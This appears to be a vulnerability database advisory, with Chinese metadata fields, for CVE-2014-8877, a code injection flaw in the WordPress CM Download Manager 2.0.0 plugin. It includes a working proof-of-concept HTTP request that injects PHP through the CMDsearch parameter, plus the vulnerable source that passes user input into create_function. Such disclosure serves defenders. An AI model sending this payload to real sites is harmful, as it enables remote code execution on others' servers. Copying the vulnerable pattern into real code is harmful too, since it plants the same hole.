Wordpress CM Download Manager 2.0.0 /lib/controllers/CMdownloadController.php 代码执行漏洞

基本字段

漏洞编号：: SSV-88986

披露/发现时间：: 2014-11-21

提交时间：: 2014-12-08

漏洞等级：

漏洞类别：: 代码执行

影响组件：: Wordpress CM Download Manager
(2.0.0)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2014-8877

CNNVD-ID：: CNNVD-201411-416

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.3KB

The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment. ``` GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 Connection: keep-alive ``` Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadC ontroller.php Vulnerable code: (Line: 130 -> 158) ``` public static function alterSearchQuery($search, $query) { if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) ) { global $wpdb; $search_term = $_GET['CMDsearch']; if( !empty($search_term) ) { $search = ''; $query->is_search = true; // added slashes screw with quote grouping when done early, so done later $search_term = stripslashes($search_term); preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches); $terms = array_map('_search_terms_tidy', $matches[0]); $n = '%'; $searchand = ' AND '; foreach((array) $terms as $term) { $term = esc_sql(like_escape($term)); $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))"; } add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1); remove_filter('posts_request', 'relevanssi_prevent_default_request'); remove_filter('the_posts', 'relevanssi_query'); } } return $search; } ```